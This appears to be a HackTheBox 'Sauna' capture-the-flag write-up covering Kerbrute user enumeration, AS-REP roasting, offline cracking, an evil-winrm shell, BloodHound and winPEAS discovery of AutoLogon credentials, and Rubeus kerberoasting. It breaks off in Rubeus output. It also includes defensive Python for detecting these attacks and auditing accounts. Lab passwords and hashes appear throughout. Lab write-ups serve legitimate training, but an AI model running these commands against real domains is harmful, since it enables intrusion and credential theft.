HackTheBox-Sauna

We are all trapped in this lonely night

The sunlight through the curtains is far too harsh


Target IP: 10.129.95.180

Difficulty: Easy

Topics covered:

Open-source intelligence (OSINT) and custom wordlist generation

Kerberos pre-authentication and user enumeration (Kerbrute)

AS-REP Roasting

Abusing Windows Remote Management (WinRM)

Active Directory enumeration and privilege-path analysis (BloodHound)

Windows registry AutoLogon credential disclosure

Windows logon sessions and how Rubeus works

DCSync and NTDS.dit hash extraction

Pass-the-Hash


Port scan

┌─[root@htb-hlx1pljzsg]─[/home/skyarrow/Desktop]
└──╼ #nmap -p- 10.129.95.180 -sV -sC -T4 -A -O
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-30 01:09 CDT
Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 7.72% done; ETC: 01:12 (0:02:47 remaining)
Stats: 0:02:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 20.00% done; ETC: 01:11 (0:00:24 remaining)
Stats: 0:03:09 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.45% done; ETC: 01:12 (0:00:00 remaining)
Stats: 0:03:41 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 90.00% done; ETC: 01:13 (0:00:00 remaining)
Stats: 0:03:41 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 91.25% done; ETC: 01:13 (0:00:00 remaining)
Nmap scan report for 10.129.95.180
Host is up (0.0026s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-30 13:11:29Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time:
| date: 2026-04-30T13:12:26
|_ start_date: N/A

TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 1.66 ms 10.10.14.1
2 2.19 ms 10.129.95.180

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.92 seconds

Enumerating SMB shares with nxc

┌─[root@htb-hlx1pljzsg]─[/home/skyarrow/Desktop]
└──╼ #nxc smb 10.129.95.180 -u "" -p "" --shares
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.129.95.180 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\:
SMB 10.129.95.180 445 SAUNA [-] Error enumerating shares: STATUS_ACCESS_DENIED

Directory brute-forcing

┌─[root@htb-hlx1pljzsg]─[/home/skyarrow/Desktop]
└──╼ #dirsearch -u http://10.129.95.180/

_|. _ _ _ _ _ _|_ v0.4.3.post1
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/skyarrow/Desktop/reports/http_10.129.95.180/__26-04-30_01-16-53.txt

Target: http://10.129.95.180/

[01:16:53] Starting:
[01:16:54] 403 - 312B - /%2e%2e//google.com
[01:16:54] 403 - 312B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[01:16:57] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[01:16:58] 200 - 30KB - /about.html
[01:17:05] 403 - 312B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[01:17:07] 200 - 15KB - /contact.html
[01:17:07] 301 - 148B - /css -> http://10.129.95.180/css/
[01:17:10] 301 - 150B - /fonts -> http://10.129.95.180/fonts/
[01:17:11] 301 - 151B - /images -> http://10.129.95.180/images/
[01:17:11] 403 - 1KB - /images/

Task Completed

Visiting about.html reveals staff names.

Turn them into a wordlist of likely username formats:

┌─[root@htb-hlx1pljzsg][/home/skyarrow/Desktop]
└──╼ #cat users.txt
Fergus
Smith
Shaun
Coins
Sophie
Driver
Hugo
Bear
Bowie
Taylor
Steven
Kerb
F.Smith
S.Coins
S.Driver
H.Bear
B.Taylor
S.Kerb
FSmith
SCoins
SDriver
HBear
BTaylor
SKerb

Run kerbrute against it

┌─[root@htb-hlx1pljzsg]─[/home/skyarrow/Desktop]
└──╼ #./kerbrute_linux_amd64 userenum -d EGOTISTICAL-BANK.LOCAL --dc EGOTISTICAL-BANK.LOCAL users.txt

__ __ __

/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 04/30/26 - Ronnie Flathers @ropnop

2026/04/30 01:27:09 > Using KDC(s):
2026/04/30 01:27:09 > EGOTISTICAL-BANK.LOCAL:88

2026/04/30 01:27:09 > [+] VALID USERNAME: FSmith@EGOTISTICAL-BANK.LOCAL
2026/04/30 01:27:09 > Done! Tested 24 usernames (1 valid) in 0.013 seconds

Kerbrute does not rely on SMB at all; it sends Kerberos AS-REQ messages without pre-authentication data to port 88 on the domain controller. If the DC answers KRB5KDC_ERR_PREAUTH_REQUIRED, the user exists; if it answers KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN, the user does not. This is very fast and does not easily trigger account lockouts, because no password guess is ever made.

┌─[root@htb-hlx1pljzsg]─[/home/skyarrow/Desktop]
└──╼ #impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/FSmith -request -no-pass -dc-ip 10.129.95.180
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies

[*] Getting TGT for FSmith
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:616f39a47a305c792f9abdf70af96eac$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

AD has a per-account option named "Do not require Kerberos preauthentication". When it is set, anyone can request a TGT for that user from the KDC. The KDC answers with an AS-REP, part of which is encrypted with a key derived from the user's password hash. An attacker extracts that encrypted part and brute-forces it offline.
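The defender's view of the two exchanges just described (Kerbrute's enumeration and the AS-REP request), as an added example that is not part of the original writeup: detection logic run over constructed Windows Security event 4768 records. The field names follow the real event, but the records, client addresses and the burst threshold of 10 are made up. When Kerberos authentication auditing is enabled, every guess for a name that does not exist leaves a failed 4768 with result 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN), so a burst of those from one client address is the enumeration signal, while the PREAUTH_REQUIRED replies for real users are part of a normal exchange and are not logged as failures. GetNPUsers leaves a successful 4768 with Pre-Authentication Type 0 and ticket encryption type 0x17 (RC4-HMAC), which almost never appears in legitimate traffic.

```python
from collections import Counter

# Constructed Windows Security event 4768 records. Field names follow the real
# event ("Status", "PreAuthType", "TicketEncryptionType"); values are made up.
def _ev(user, ip, status, preauth, etype):
    return {"TargetUserName": user, "IpAddress": ip, "Status": status,
            "PreAuthType": preauth, "TicketEncryptionType": etype}

ATTACKER = "10.10.14.7"   # constructed source address for the tooling host

# 23 wordlist entries that do not exist: KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN
# (0x6). Failed 4768s carry no pre-auth type ("-") and etype 0xffffffff.
SAMPLE_4768 = [_ev(f"guess{i}", ATTACKER, "0x6", "-", "0xffffffff")
               for i in range(23)]
SAMPLE_4768 += [
    # FSmith exists and has pre-auth disabled: the AS-REP request succeeds
    # with no pre-auth data (type 0) and an RC4-encrypted reply (0x17).
    _ev("FSmith", ATTACKER, "0x0", "0", "0x17"),
    # Normal logon elsewhere: timestamp pre-auth (type 2), AES256 (0x12).
    _ev("svc_loanmgr", "10.129.95.20", "0x0", "2", "0x12"),
    # A single mistyped name from a workstation is not an enumeration burst.
    _ev("jsmith", "10.129.95.21", "0x6", "-", "0xffffffff"),
]


def find_enumeration_bursts(events, threshold=10):
    """Map client address -> number of unknown-principal failures, keeping only
    addresses at or above the threshold. Kerbrute's probes show up in the log
    only for names that do not exist, so a burst of 0x6 is the signal."""
    unknown = Counter(e["IpAddress"] for e in events if e["Status"] == "0x6")
    return {ip: n for ip, n in unknown.items() if n >= threshold}


def find_asrep_roast_requests(events):
    """Return (address, user) for TGTs issued with no pre-authentication and an
    RC4 reply: exactly what GetNPUsers produces, and rare in normal traffic."""
    return [(e["IpAddress"], e["TargetUserName"]) for e in events
            if e["Status"] == "0x0" and e["PreAuthType"] == "0"
            and e["TicketEncryptionType"] == "0x17"]


if __name__ == "__main__":
    print("enumeration bursts:", find_enumeration_bursts(SAMPLE_4768))
    print("AS-REP roast requests:", find_asrep_roast_requests(SAMPLE_4768))
```

The two checks are independent on purpose: the burst check fires during the wordlist run, before any password material leaves the DC, and the pre-auth-type check catches the single request that actually yields crackable data even if enumeration was done elsewhere. Both need "Audit Kerberos Authentication Service" enabled on the DC to produce the records.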

Crack it with john

┌─[root@htb-hlx1pljzsg]─[/home/skyarrow/Desktop]
└──╼ #john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23 ($krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:08 DONE (2026-04-30 01:30) 0.1116g/s 1176Kp/s 1176Kc/s 1176KC/s Thrall..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌─[root@htb-hlx1pljzsg]─[/home/skyarrow/Desktop]
└──╼ #nxc smb 10.129.95.180 -u "FSmith" -p "Thestrokes23"
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.129.95.180 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\FSmith:Thestrokes23

Authentication succeeded

┌─[✗][root@htb-hlx1pljzsg][/home/skyarrow/Desktop]
└──╼ #nxc winrm 10.129.95.180 -u "FSmith" -p "Thestrokes23"
WINRM 10.129.95.180 5985 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
WINRM 10.129.95.180 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\FSmith:Thestrokes23 (Pwn3d!)

┌─[root@htb-hlx1pljzsg]─[/home/skyarrow/Desktop]
└──╼ #evil-winrm -i 10.129.95.180 -u "FSmith" -p "Thestrokes23"

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> type C:\Users\FSmith\desktop\user.txt
ce7cbd923d6a58333fa0985c71afb925

Upload SharpHound to map the domain structure

*Evil-WinRM* PS C:\Users\FSmith\Documents> upload SharpHound.exe

Info: Uploading /home/skyarrow/Desktop/SharpHound.exe to C:\Users\FSmith\Documents\SharpHound.exe

Data: 1802240 bytes of 1802240 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Documents> ./SharpHound.exe -c all
2026-04-30T06:36:25.8204408-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2026-04-30T06:36:25.8516423-07:00|INFORMATION|SharpHound Version: 2.12.0.0
2026-04-30T06:36:25.8516423-07:00|INFORMATION|SharpHound Common Version: 4.6.1.0
2026-04-30T06:36:26.0235423-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2026-04-30T06:36:26.0547822-07:00|INFORMATION|Initializing SharpHound at 6:36 AM on 4/30/2026
2026-04-30T06:36:26.1016560-07:00|INFORMATION|Resolved current domain to EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.2578981-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2026-04-30T06:36:26.3516588-07:00|INFORMATION|Beginning LDAP search for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.3673070-07:00|INFORMATION|Collecting AdminSDHolder data for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.4141745-07:00|INFORMATION|AdminSDHolder ACL hash 00282C4ECB176A3D401881255CEFB538664FC932 calculated for EGOTISTICAL-BANK.LOCAL.
2026-04-30T06:36:26.5391447-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.5391447-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.5391447-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.5391447-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.5547658-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.5547658-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.5547658-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.6485268-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.7891484-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.7891484-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.7891484-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8360164-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8516454-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8516454-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8672735-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8672735-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8672735-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8829012-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8829012-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8829012-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8985228-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8985228-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8985228-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.9141541-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.9141541-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.9141541-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.9141541-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.9297746-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.9297746-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.9297746-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.9453983-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.9766474-07:00|INFORMATION|Beginning LDAP search for EGOTISTICAL-BANK.LOCAL Configuration NC
2026-04-30T06:36:27.0079007-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.0547708-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2110277-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2110277-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2110277-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2735189-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2735189-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2891456-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2891456-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2891456-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2891456-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2891456-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2891456-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2891456-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2891456-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2891456-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.3047660-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.3047660-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.3047660-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:28.4297690-07:00|INFORMATION|Producer has finished, closing LDAP channel
2026-04-30T06:36:28.4297690-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2026-04-30T06:36:34.0078989-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2026-04-30T06:36:34.0391523-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2026-04-30T06:36:34.1490701-07:00|INFORMATION|Status: 297 objects finished (+297 42.42857)/s -- Using 70 MB RAM
2026-04-30T06:36:34.1490701-07:00|INFORMATION|Enumeration finished in 00:00:07.8041284
2026-04-30T06:36:34.2266442-07:00|INFORMATION|Saving cache with stats: 16 ID to type mappings.
0 name to SID mappings.
1 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2026-04-30T06:36:34.2579125-07:00|INFORMATION|SharpHound Enumeration Completed at 6:36 AM on 4/30/2026! Happy Graphing!
*Evil-WinRM* PS C:\Users\FSmith\Documents> dir


Directory: C:\Users\FSmith\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/30/2026 6:36 AM 30530 20260430063628_BloodHound.zip
-a---- 4/30/2026 6:36 AM 1351680 SharpHound.exe
-a---- 4/30/2026 6:36 AM 1308 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin


Upload winPEAS for further enumeration

╔══════════╣ Home folders found (T1083)
C:\Users\Administrator
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\FSmith : FSmith [Allow: AllAccess]
C:\Users\Public
C:\Users\svc_loanmgr

╔══════════╣ Looking for AutoLogon credentials (T1552.002)
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!


A set of credentials was found.

The matching user account turned up as well:

Computer Name : SAUNA
User Name : svc_loanmgr
User Id : 1108
Is Enabled : True
User Type : User
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/24/2020 4:48:31 PM

Looking at the domain data in BloodHound shows that this user has DCSync rights over the domain.

Something else interesting turned up as well:

╔══════════╣ Kerberoasting / service ticket risks (T1558.003)
╚ Enumerate weak SPN accounts and legacy Kerberos crypto https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/kerberoast.html
[-] Domain default supported encryption types not set (legacy compatibility defaults to RC4).
krbtgt supports: Unspecified (inherits defaults / RC4 compatible) - RC4 TGTs can still be issued.
╚ Checked 3 SPN-bearing accounts. High-risk RC4/privileged targets: 1, long-lived AES-only targets: 0.
[!] RC4-enabled or privileged SPN accounts:
- HSmith (Hugo Smith) | SPNs: SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111 | Enc: Unspecified (inherits defaults / RC4 compatible) | RC4 allowed; PasswordNeverExpires; PwdLastSet 2020-01-23
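The winPEAS finding above comes from two LDAP attributes, and reading them correctly is the hardening check an AD admin wants. As an added example (not part of the original writeup or of winPEAS), the block below decodes the msDS-SupportedEncryptionTypes bitmask and userAccountControl flags for a constructed set of account records: HSmith and FSmith mirror what the page shows (an SPN with unspecified encryption types and a non-expiring password; pre-authentication disabled), while svc_hardened is a made-up account showing the remediated state (AES-only keys, no weak flags). The bit values are the documented ones from MS-KILE and MS-ADTS; the records themselves are constructed.

```python
# msDS-SupportedEncryptionTypes bits (MS-KILE section 2.2.7). A missing or zero
# value means "unspecified", which the KDC treats as RC4-compatible.
ETYPE_BITS = {
    0x1: "DES_CBC_CRC",
    0x2: "DES_CBC_MD5",
    0x4: "RC4_HMAC",
    0x8: "AES128_CTS_HMAC_SHA1_96",
    0x10: "AES256_CTS_HMAC_SHA1_96",
}
WEAK_MASK = 0x7                   # any DES or RC4 bit
AES_ONLY = 0x18                   # the value to set during remediation

# userAccountControl flags (MS-ADTS)
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed account records shaped like LDAP search results.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "HSmith",
     "servicePrincipalName": ["SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111"],
     "msDS-SupportedEncryptionTypes": None,          # unspecified -> RC4
     "userAccountControl": 0x200 | UF_DONT_EXPIRE_PASSWD},
    {"sAMAccountName": "FSmith",
     "servicePrincipalName": [],
     "msDS-SupportedEncryptionTypes": None,
     "userAccountControl": 0x200 | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "svc_hardened",               # constructed, remediated
     "servicePrincipalName": ["HTTP/app.egotistical-bank.local"],
     "msDS-SupportedEncryptionTypes": AES_ONLY,
     "userAccountControl": 0x200},
]


def decode_etypes(value):
    """Names of the encryption types an account advertises."""
    if not value:
        return ["UNSPECIFIED (defaults to RC4)"]
    return [name for bit, name in ETYPE_BITS.items() if value & bit]


def allows_rc4_or_des(value):
    """True when a service ticket for this account may be issued with a
    crackable RC4 or DES key."""
    return not value or bool(value & WEAK_MASK)


def audit_accounts(accounts):
    """Return (sAMAccountName, [issues]) for accounts that need remediation."""
    findings = []
    for a in accounts:
        issues = []
        if a.get("servicePrincipalName"):
            if allows_rc4_or_des(a.get("msDS-SupportedEncryptionTypes")):
                issues.append("SPN with RC4/DES-capable keys: set "
                              f"msDS-SupportedEncryptionTypes to {AES_ONLY:#x} "
                              "and rotate the password")
            if a["userAccountControl"] & UF_DONT_EXPIRE_PASSWD:
                issues.append("service account password never expires")
        if a["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH:
            issues.append("pre-authentication disabled (AS-REP roastable)")
        if issues:
            findings.append((a["sAMAccountName"], issues))
    return findings


if __name__ == "__main__":
    for name, issues in audit_accounts(SAMPLE_ACCOUNTS):
        print(name)
        for issue in issues:
            print("  -", issue)
```

Rotating the password matters as much as the bitmask change: AES keys are derived from the password, so an account whose only key is an old RC4-era hash keeps the old key material until the password is set again after the attribute is updated.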


HSmith has an SPN registered, so we can try uploading Rubeus to obtain the current user's TGT.

*Evil-WinRM* PS C:\Users\FSmith\Documents> .\Rubeus.exe kerberoast /user:HSmith

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.0


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target User : HSmith
[*] Target Domain : EGOTISTICAL-BANK.LOCAL
[*] Searching path 'LDAP://SAUNA.EGOTISTICAL-BANK.LOCAL/DC=EGOTISTICAL-BANK,DC=LOCAL' for '(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=HSmith)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1


[*] SamAccountName : HSmith
[*] DistinguishedName : CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
[*] ServicePrincipalName : SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111
[*] PwdLastSet : 1/22/2020 9:54:34 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT

[X] Error during request for SPN SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111@EGOTISTICAL-BANK.LOCAL : No credentials are available in the security package

*Evil-WinRM* PS C:\Users\FSmith\Documents>

It failed.

When you connect with evil-winrm, Windows treats it as a network logon (Logon Type 3). For that logon type the Local Security Authority (LSA) does not cache the user's plaintext password or a reusable Kerberos TGT in memory. Rubeus's kerberoast module by default needs to pull a TGT out of the current session's LSA in order to request TGS tickets from the KDC, and in a WinRM session the LSA has nothing usable (no credential package), so it errors out immediately.

Try another approach: request the TGT manually.

*Evil-WinRM* PS C:\Users\FSmith\Documents> .\Rubeus.exe asktgt /user:fsmith /password:Thestrokes23 /domain:EGOTISTICAL-BANK.LOCAL /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.0

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 58A52D36C84FB7F5F1BEAB9A201DB1DD
